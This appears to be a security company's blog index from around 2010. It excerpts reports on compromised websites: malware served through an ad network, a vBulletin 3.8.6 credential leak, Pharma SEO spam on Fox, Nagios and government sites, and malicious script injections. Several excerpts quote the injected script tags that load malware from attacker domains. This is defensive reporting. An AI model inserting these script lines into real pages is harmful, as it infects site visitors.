UFC.com blacklisted by Google (indirectly)

Anyone trying to visit the site UFC.com (from Google Chrome or Firefox) will get a big scary warning from Google:

UFC.com blacklisted

Warning: Visiting this site may harm your computer!
The website at www.ufc.com contains elements from the site bin.clearspring.com, which appears to host malware – software that can hurt your computer or otherwise operate without your consent. Just visiting a site that contains malware can infect your computer.

They are getting indirectly blacklisted because they are loading content from bin.clearspring.com (an advertising network), which is currently blacklisted by Google for having malware.

As far as clearspring is concerned, it seems they’ve been hacked and the attacker has added malicious code to load malware from semaniseme.com and wenmo.in. So multiple levels of indirection here to affect UFC.com users.

Anyone else using clearspring should remove their code from their sites until they have this blacklist issue sorted out.

To avoid getting your site blacklisted or with malware, visit http://sucuri.net to learn about our site security monitoring and malware removal solutions.

Vulnerability in Vbulletin 3.8.6

If you are running Vbulletin 3.8.6 (the latest 3.8.x version), make sure to remove the faq.php as soon as possible. A vulnerability has been found that allows anyone to retrieve the database credentials from there.

The VBSEO team was quick to react and sent the following note to their clients a little while ago:

Hello valued vBSEO customer,

It has come to our attention that a vulnerability on vBulletin 3.8.6
has been discovered. The exploit allows a malicious user to retrieve a
forum’s database credentials via the faq.php script.

If you are running vBulletin 3.8.6, we strongly recommend that you
remove the faq.php script and change your mysql database details as a
precaution.

You can find faq.php in your vBulletin installation directory:
*/vbroot/faq.php

Update: Patch available here.

It seems that a patch is coming very soon too. Some discussion about this issue here. Thanks to Marcus Maciel for the heads up.

Yet another series of attacks – This time using whereisdudescars.com

Update 1: It seems that this attack is limited to only Bluehost and Dreamhost, not GoDaddy like in the previous times.
Update 2: This script should fix/clean an infected site: site fix.php
Update 3: Attackers are using nowisisdudescars.com and onlineisdudescars.com as well.

We’re tracking another series of attacks affecting many web sites (WordPress seems to be the target application so far). This time they’re using whereisdudescars.com as the attacking site and adding the following javascript to the web sites:

<script src=" http://whereisdudescars.com/js2.php"></script>

<script src=" http://nowisisdudescars.com/js.php

This code then loads another javascript from http://www4.realprotection36.co.cc attempting to push the “Fake Anti virus” virus to the visitor of the site.

Read More

Fox News Website Hacked

We reported yesterday evening that various sites in the Fox web network have been infected with the Pharma Hack. It doesn’t stop there.

I just ran some scans on the official Fox News site (foxnews.com) and here are the results:

Read More

Various Fox Websites Hit With Pharma Hack

Fox Websites Exploited with Pharma HackIf you’ve been following Sucuri, you’ve seen a bunch of discussion around the steadily growing Pharma Hack. As we continue research on the issue we find more and more variations of the exploit.

Earlier this evening, we started noticing various domains from the same network of sites appearing in our test results. It looks like various pages on sites owned or operated by Fox Television Stations, Inc. and/or their affiliates have been compromised. We’ve followed up and scanned a set of these sites, and at the time this post was written, they were still serving the spam exploit.

Read More

Understanding and cleaning the Pharma hack on WordPress

In the last few weeks, the most common questions we’re receiving are related to the “Pharma” (or Blackhat SEO Spam) Hack on WordPress sites.

This attack is very interesting because it is not visible to the normal user and the spam (generally about Viagra, Nexium, Cialis, etc) only shows up if the user agent is from Google’s crawler (googlebot). Also, the infection is a bit tricky to remove and if not done properly will keep reappearing.

Because of this behavior, many sites have been compromised for months with those spam keywords and no one is noticing. A quick way to check if your site is compromised is by searching on Google for “inurl:yoursite.com cheap viagra or cheap cialis” or using our security scanner.

For example, this is the result of our scanner against wpremix.com (which was infected at the time we were writing this post):


Read More

Nagios Community Site Hacked

We just detected (via our scanner) that the Nagios community site (community.nagios.org) has been hacked and is redirecting to a Viagra site. The results vary depending on the page request.

If you try to visit any page and add a “order=X” in the query you will be redirected. Example:

$ lynx –head –dump http://community.nagios.org/?order=1
HTTP/1.1 302 Found
Date: Tue, 13 Jul 2010 02:54:37 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Location: http://the pharmacy discount.com/item.php?id=1095&said=m111


Read More

Israel’s permanent mission in the UN web site hacked

As we dig into this blackhat SEO spam network, we are finding more and more sites hacked by them.

One of the sites we discovered is the http://israel-un.mfa.gov.il (Israeli permanent mission in the UN). It is probable they’ve been exploited due to using an old version of Joomla that has security vulnerabilities.

This is the results of our scan against it:

In fact, if you just view their source code you will find all the spam:

Read More

Argentinean Government web sites hacked with spam

We recently blogged that many sites from the Brazilian government got hacked and were being used as part of a large blackhat SEO spam network.

Well, the Brazilians are not alone and many web sites from the Argentinean government got hacked as well and are being used by spammers. Some of them are official web sites for ministries, states and cities throughout Argentina.

http://www.bnm.me.gov.ar

http://www.trabajo.gov.ar

http://www.cedem.gov.ar

http://www.sanmartin.gov.ar

http://www.jusmisiones.gov.ar

http://www.apostoles.gov.ar

http://www.cordoba.gov.ar

http://www.santafecultura.gov.ar

http://www.mocoreta.gov.ar

..

http://www.lasheras.gov.ar

http://www.dipes.catamarca.gov.ar

http://www2.berisso.gba.gov.ar

(and many more)

All of them got hacked and you can easily find a lot more sites like that on Google just by searching for “inurl:.gov.ar “cheap viagra” or “cheap cialis””. Examples of Google results:

Read More

osCommerce users, update your installations as soon as possible

If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible. We have been tracking multiple compromises of osCommerce installations where the attackers added this javascript malware to the affected sites:

< script src = “http://nt02.co.in/3″ >

This code is used to load malware to unsuspecting visitors of your site. Most of the sites affected also had a few PHP files inserted inside the /images folder, generally called inclasses.php, loadclasses.php or phpclasses.php.

We are still researching how those sites got hacked and which vulnerability was used. It could be this one, or some of the others recently published.

If you have more information let us know.